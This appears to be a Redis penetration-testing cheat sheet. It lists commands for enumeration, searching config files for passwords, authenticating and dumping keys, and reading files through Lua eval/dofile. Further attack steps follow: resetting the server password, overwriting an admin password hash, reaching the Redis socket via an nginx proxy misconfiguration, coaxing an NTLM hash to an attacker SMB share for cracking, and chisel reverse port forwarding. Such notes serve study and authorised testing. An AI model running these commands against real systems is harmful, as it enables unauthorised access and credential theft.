# Redis Pentesting #### Redis is the In-Memory NoSQL Database. A default port is 6379. ### Enumeration ```shellscript nmap --script redis-info -p 6379 nmap --script redis-brute -p 6379 msf> use auxiliary/scanner/redis/redis_server ``` #### Check Config File If we have access to target system, find the configuration file then we may be able to get passwords. ```shellscript find / -name "redis.conf" 2>/dev/null grep -i pass /path/to/redis.conf ``` If we get the line with password written as below, ```shellscript requirepass "password" ``` We can set the password in a redis client. ```shellscript > auth "password" ``` ### Connect ```shellscript redis-cli -h -p 6379 # with password redis-cli -h -p 6379 -a password # using socket redis-cli -s /path/to/redis.sock ``` After connecting and execute the first arbitrary command, we may got the following output. ```shellscript NOAUTH Authentication required. ``` If so, we need to authenticate to communicate with the redis server. ```shellscript > auth # or > auth default # or > auth ``` ### Commands (Non-RESP Format) **Non-RESP (REdis Serialization Protocol)** is such like the other protocol's command. Commands are separated with spaces. #### Investigation ```shellscript # Check credentials > auth > auth default # Set a password temporary until the service restarts. > config set requirepass # Information on the Redis server > info > info keyspace # List all > config get * # List all databases > config get databases # Select the database ('select ') > select 0 > select 1 > select 12 # Read files and directories using Lua scripts > eval "dofile('C:\\\\Users\\\\Administrator\\\\Desktop\\\\user.txt')" 0 > eval "dofile('C:\\\\Users\\\\\\\\Desktop\\\\user.txt')" 0 # Find all keys > keys * ``` #### Get Key Value ```shellscript # Get the type of value > type # Get all fields and values of the hash stored at key. > hgetall # e.g. > hgetall admin # Get a string value > get # e.g. > get admin email # Get a hashed value > hget # e.g. > hget admin password # Get multiple hashed values associated with specified fields > hmget # e.g. > hmget admin email password # type: lists > lrange # e.g. > lrange "userlist" 0 0 > lrange "userlist" 0 5 # type: sets > smembers # type: sorted sets > zrangebyscore # type: stream > xread count streams ``` #### Set Key Value ```shellscript # Set a hashed value in a field > set # e.g. > set admin email admin@example.com # Set a hashed value in a field > hset # e.g. > hset admin password 286755fad04869ca523320acce0dc6a4 ``` #### Insert Values ```shellscript > lpush > lpush > lpush # e.g. > lpush myword "abracadabra" ``` ### Commands (RESP Format) **RESP (REdis Serialization Protocol)** is The syntax is… * **`*`** The number of arguments. * **`$`** The string length of the argument. Below is the command same as **`set name "john"`**. ```shellscript telnet 10.0.0.1 6379 Trying 10.0.0.1... Connected to 10.0.0.1. Escape character is '^]'. *3 $3 set $4 name $4 john ``` ### GET/SET Key Value Commands with Nginx Misconfiguration ``` location ~ /(.*)/(.*) { resolver 127.0.0.1; proxy_pass http://example.com/$1; } ``` We can connect to redis socket using **`curl`** command. ``` # HSET curl -X "HSET" https://example.com/unix:/path/to/redis.sock:%20%20%20/abc ``` ### NTLM Hash Disclosure In local machine, start SMB server. ``` mkdir share sudo impacket-smbserver share ./share/ -smb2support ``` Now execute the following command in Redis client. ``` > eval "dofile('//10.0.0.1/share')" 0 ``` We might get a NTLM hash in the incoming connection to the SMB server. We can see the SMB server logs in terminal.\ If the NTLM hash found, crack it. ### Port Forwarding Redis Server to Local Machine In local machine, ``` chisel server -p 9001 --reverse ``` In target machine, ``` ./chisel client :9001 R:6379:127.0.0.1:6379 ```